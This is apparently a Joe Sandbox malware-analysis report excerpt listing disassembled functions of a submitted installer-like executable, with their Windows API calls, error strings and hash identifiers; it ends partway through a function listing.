                                                            • Instruction Fuzzy Hash: FF41E43164161FBBCB276A64CC85FBAB66CFF00764F009215F818E6254DBB4EC5097D1
                                                            Function 0088F051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0088F06E
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0088F19B
                                                            Strings
                                                            • Failed to post launch approved exe message., xrefs: 0088F186
                                                            • Failed to copy the id., xrefs: 0088F100
                                                            • Engine is active, cannot change engine state., xrefs: 0088F089
                                                            • Failed to copy the arguments., xrefs: 0088F12D
                                                            • EngineForApplication.cpp, xrefs: 0088F17C
                                                            • UX requested unknown approved exe with id: %ls, xrefs: 0088F0CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                            • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                            • API String ID: 1367039788-528931743
                                                            • Opcode ID: 9dadc29e89650ee263f0899b8a5340e7677ac978b8c2693503a6a401ba956c4f
                                                            • Instruction ID: 63a53cf9bb76da51a53047c582372a223f331090615b027a4f528e1fd44f09b3
                                                            • Opcode Fuzzy Hash: 9dadc29e89650ee263f0899b8a5340e7677ac978b8c2693503a6a401ba956c4f
                                                            • Instruction Fuzzy Hash: 7D31B436A40626EFCB22AF68DC49E5A77A8FF04720B018525FE04EB252EB75DD008791
                                                            Function 0088969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0088A7D4,00000000,00000000,00000000,?,00000000), ref: 008896B8
                                                            • GetLastError.KERNEL32(?,0088A7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008896C6
                                                              • Part of subcall function 008B4102: Sleep.KERNEL32(?,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00874DBC), ref: 008B4119
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008897A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLastSleep
                                                            • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                            • API String ID: 1275171361-1187406825
                                                            • Opcode ID: ff055f70628824e85826d4e378e333ca5d71476c875d13dceb5bcebaebc9f627
                                                            • Instruction ID: 03d4be5ad2350bc6e7d7da88dadb9bf05465af5aa421022162e0c96a6914ece4
                                                            • Opcode Fuzzy Hash: ff055f70628824e85826d4e378e333ca5d71476c875d13dceb5bcebaebc9f627
                                                            • Instruction Fuzzy Hash: A4210432A806257BD6223D188C46FBB3668FF51B60F180118FE55FA381D2A2DC019AE6
                                                            Function 00876F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00876FB2
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008771BE
                                                            Strings
                                                            • Failed to set variable value., xrefs: 00877171
                                                            • Unsupported variable type., xrefs: 00877184
                                                            • Failed to read variable value type., xrefs: 008771A0
                                                            • Failed to read variable literal flag., xrefs: 00877199
                                                            • Failed to read variable value as number., xrefs: 00877178
                                                            • Failed to read variable count., xrefs: 00876FD2
                                                            • Failed to read variable name., xrefs: 008771A7
                                                            • Failed to read variable value as string., xrefs: 0087718B
                                                            • Failed to read variable included flag., xrefs: 008771AE
                                                            • Failed to set variable., xrefs: 00877192
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                            • API String ID: 3168844106-528957463
                                                            • Opcode ID: eb3192e3f51e34a9d1c5bd5f047cd2a5b5bb394a176da28451b33187babdf0c4
                                                            • Instruction ID: 8a7f03e81aac1f8abaecc570b3432a999332ea6b6a2eaec9bafa17373db334bd
                                                            • Opcode Fuzzy Hash: eb3192e3f51e34a9d1c5bd5f047cd2a5b5bb394a176da28451b33187babdf0c4
                                                            • Instruction Fuzzy Hash: C9718C72C0421EBBDF12DAA8CD41EAEBBB9FB01714F508121F914E6264E731DE10DBA0
                                                            Function 008B44D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 008B4550
                                                            • GetLastError.KERNEL32 ref: 008B4566
                                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 008B45BF
                                                            • GetLastError.KERNEL32 ref: 008B45C9
                                                            • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 008B461D
                                                            • GetLastError.KERNEL32 ref: 008B4628
                                                            • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 008B4717
                                                            • CloseHandle.KERNEL32(?), ref: 008B478A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 3286166115-2967768451
                                                            • Opcode ID: e128bde8859954fc55772ce5ebffb44bef50e12bd96904ded506592a015c1e74
                                                            • Instruction ID: 86d7e20cb2e92d5e2784ecfb0f13d397079869c3c8571245e201b2d2a455c20c
                                                            • Opcode Fuzzy Hash: e128bde8859954fc55772ce5ebffb44bef50e12bd96904ded506592a015c1e74
                                                            • Instruction Fuzzy Hash: 79813831A4062AEBEB318E598C43BFB77A8FB01724F115229FD55EB382E774CD008695
                                                            Function 00873076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 008730C1
                                                            • GetLastError.KERNEL32 ref: 008730C7
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00873121
                                                            • GetLastError.KERNEL32 ref: 00873127
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008731DB
                                                            • GetLastError.KERNEL32 ref: 008731E5
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087323B
                                                            • GetLastError.KERNEL32 ref: 00873245
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                            • String ID: @$pathutil.cpp
                                                            • API String ID: 1547313835-3022285739
                                                            • Opcode ID: 99e2605b1f68d2594c02d7924db96764b28c21066dea8cb91f7222b1f9ffa5b1
                                                            • Instruction ID: 0583dd0d83ab1ca2b4105e3421c41a128eab3d3abea324f2a5558d75484bb334
                                                            • Opcode Fuzzy Hash: 99e2605b1f68d2594c02d7924db96764b28c21066dea8cb91f7222b1f9ffa5b1
                                                            • Instruction Fuzzy Hash: 0361D533D00629BBDB219AE48844B9EB768FB00755F11C265EE08FB255E771DF00A7E2
                                                            Function 008B6D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,008B72C8,?,?), ref: 008B6DA6
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6E11
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6E89
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6EC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Free$Compare
                                                            • String ID: `<u$label$scheme$term
                                                            • API String ID: 1324494773-4028212031
                                                            • Opcode ID: 801a1207353f50cf758124726e6024784a177b1d88f134a7f59e844990dfbfc9
                                                            • Instruction ID: 033b1904236272613226b61b19558852eea688099db2515f538f03379ba65ddb
                                                            • Opcode Fuzzy Hash: 801a1207353f50cf758124726e6024784a177b1d88f134a7f59e844990dfbfc9
                                                            • Instruction Fuzzy Hash: B8513D35901219FBCB15DB94C845EEEBBB8FF04711F2802A9E511E62A0E775DE20DB50
                                                            Function 00884D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • UuidCreate.RPCRT4(?), ref: 00884DC0
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 00884DEF
                                                            • UuidCreate.RPCRT4(?), ref: 00884E3A
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 00884E66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateFromStringUuid
                                                            • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                            • API String ID: 4041566446-2510341293
                                                            • Opcode ID: 9a34156aa5b7fc9808950b09c63e1d92c21071506500af950d19dcebbc79a845
                                                            • Instruction ID: 7d7611b60f9e9c6e06178bcd2946ad4dc64ba0a7aed696e6434ac33ea0ef903f
                                                            • Opcode Fuzzy Hash: 9a34156aa5b7fc9808950b09c63e1d92c21071506500af950d19dcebbc79a845
                                                            • Instruction Fuzzy Hash: 79416A72D40309ABDB20EBE8C945FDEB7F8FB54720F20412AE905FB240D6759945CB91
                                                            Function 0088EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0087548E,?,?), ref: 0088EA9D
                                                            • GetLastError.KERNEL32(?,0087548E,?,?), ref: 0088EAAA
                                                            • CreateThread.KERNEL32(00000000,00000000,0088E7B4,?,00000000,00000000), ref: 0088EB03
                                                            • GetLastError.KERNEL32(?,0087548E,?,?), ref: 0088EB10
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0087548E,?,?), ref: 0088EB4B
                                                            • CloseHandle.KERNEL32(00000000,?,0087548E,?,?), ref: 0088EB6A
                                                            • CloseHandle.KERNEL32(?,?,0087548E,?,?), ref: 0088EB77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                            • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                            • API String ID: 2351989216-3599963359
                                                            • Opcode ID: f60f7e866ed3187ab9fdffc835cb85a3377895ecf82cac7238d8ff4bbe9ce98d
                                                            • Instruction ID: 614d6aa1b1b3e37568bf4655e242cc49aca41248a4d954f8a10110f5b4febcb5
                                                            • Opcode Fuzzy Hash: f60f7e866ed3187ab9fdffc835cb85a3377895ecf82cac7238d8ff4bbe9ce98d
                                                            • Instruction Fuzzy Hash: 00319276D41229BFDB10AF998D85AAFBBB8FF04760F110169F915F7240E6709E008BA1
                                                            Function 0088E645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0087548E,?,?), ref: 0088E666
                                                            • GetLastError.KERNEL32(?,?,0087548E,?,?), ref: 0088E673
                                                            • CreateThread.KERNEL32(00000000,00000000,0088E3C8,00000000,00000000,00000000), ref: 0088E6D2
                                                            • GetLastError.KERNEL32(?,?,0087548E,?,?), ref: 0088E6DF
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0087548E,?,?), ref: 0088E71A
                                                            • CloseHandle.KERNEL32(?,?,?,0087548E,?,?), ref: 0088E72E
                                                            • CloseHandle.KERNEL32(?,?,?,0087548E,?,?), ref: 0088E73B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                            • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                            • API String ID: 2351989216-1977201954
                                                            • Opcode ID: 27d3e523d8645fe0d21d1cab29e9178b73c5e00cbee3f2ed42f85aa04b0964c5
                                                            • Instruction ID: 814c0916399d256b980e25107882821181fba4dd0d03c326e40ec649217f19f7
                                                            • Opcode Fuzzy Hash: 27d3e523d8645fe0d21d1cab29e9178b73c5e00cbee3f2ed42f85aa04b0964c5
                                                            • Instruction Fuzzy Hash: 4F319776D4062ABBDB21AB99CC45AAFBBB8FF54710F11416AFD10F6240E7749900CBD1
                                                            Function 008914E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00875405,008753BD,00000000,00875445), ref: 00891506
                                                            • GetLastError.KERNEL32 ref: 00891519
                                                            • GetExitCodeThread.KERNEL32(008BB488,?), ref: 0089155B
                                                            • GetLastError.KERNEL32 ref: 00891569
                                                            • ResetEvent.KERNEL32(008BB460), ref: 008915A4
                                                            • GetLastError.KERNEL32 ref: 008915AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                            • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                            • API String ID: 2979751695-3400260300
                                                            • Opcode ID: 8e403bae2e48be31fb2f798d2548eaffc5be10ad48632159f5486baf6baa91d7
                                                            • Instruction ID: 5848789005293c5e6a05228567f22e4164d1cb1423b99b14a64912751b65e456
                                                            • Opcode Fuzzy Hash: 8e403bae2e48be31fb2f798d2548eaffc5be10ad48632159f5486baf6baa91d7
                                                            • Instruction Fuzzy Hash: C831B870B44207EBDF10AF698D09BAE7BF8FB44710B12816AF916D6250E774CD009B51
                                                            Function 008915FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(008BB478,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?), ref: 0089161B
                                                            • GetLastError.KERNEL32(?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?,00875489,FFF9E89D,00875489), ref: 00891625
                                                            • WaitForSingleObject.KERNEL32(008BB488,000000FF,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?,00875489), ref: 0089165F
                                                            • GetLastError.KERNEL32(?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?,00875489,FFF9E89D,00875489), ref: 00891669
                                                            • CloseHandle.KERNEL32(00000000,00875489,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000), ref: 008916B4
                                                            • CloseHandle.KERNEL32(00000000,00875489,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000), ref: 008916C3
                                                            • CloseHandle.KERNEL32(00000000,00875489,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000), ref: 008916D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                            • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                            • API String ID: 1206859064-226982402
                                                            • Opcode ID: 5b46c5d41b16c9802c3b7c5cfb317099bf261fb4b582188c9958e0d4254fe432
                                                            • Instruction ID: 21222efec9bb995ddb52a429c5cb70bb399d041f79d4e9051931576412b86732
                                                            • Opcode Fuzzy Hash: 5b46c5d41b16c9802c3b7c5cfb317099bf261fb4b582188c9958e0d4254fe432
                                                            • Instruction Fuzzy Hash: F821F632944A23BBCF226B55CC0DB56B7B0FF14725F1D4225E918E1A90D774EC50CADA
                                                            Function 008841EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0523: EnterCriticalSection.KERNEL32(008DB5FC,00000000,?,?,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B0533
                                                              • Part of subcall function 008B0523: LeaveCriticalSection.KERNEL32(008DB5FC,?,?,008DB5F4,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B067A
                                                            • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00884212
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0088421E
                                                            • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008C39D4,00000000), ref: 0088426B
                                                            • CloseEventLog.ADVAPI32(00000000), ref: 00884272
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                            • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                            • API String ID: 1844635321-1389066741
                                                            • Opcode ID: 99f080a469b33093ee0a152872b3f5ac22fdf7119da4727f77e9db2bce1878ad
                                                            • Instruction ID: dc433f6670628ab9994dd528b1e19a10969bbdfa91cb7e75472f6c6d589b8904
                                                            • Opcode Fuzzy Hash: 99f080a469b33093ee0a152872b3f5ac22fdf7119da4727f77e9db2bce1878ad
                                                            • Instruction Fuzzy Hash: E1F08133A85A727A963136A61C0AE7F5D7CFA82F317024118BD20F5281DBA8CD0386F5
                                                            Function 008893FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 0088949E
                                                            • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 008894C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                            • API String ID: 1452528299-4263581490
                                                            • Opcode ID: 78b874c25efca41ef55815e62fdccfc74ff46ccad488e96ecc39c2356e868199
                                                            • Instruction ID: 59d45c3c7b357c7388b211fa32a39d8a98e033ad83fbdebc502b72509ad8d231
                                                            • Opcode Fuzzy Hash: 78b874c25efca41ef55815e62fdccfc74ff46ccad488e96ecc39c2356e868199
                                                            • Instruction Fuzzy Hash: 51716072D00229ABDB11EFD8C841FEEB7B8FB18720F154129E955FB281E7349D418BA1
                                                            Function 0088E56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0088E577
                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0088E5B5
                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0088E5C2
                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 0088E5D1
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0088E5DF
                                                            • CreateCompatibleDC.GDI32(?), ref: 0088E5EB
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0088E5FC
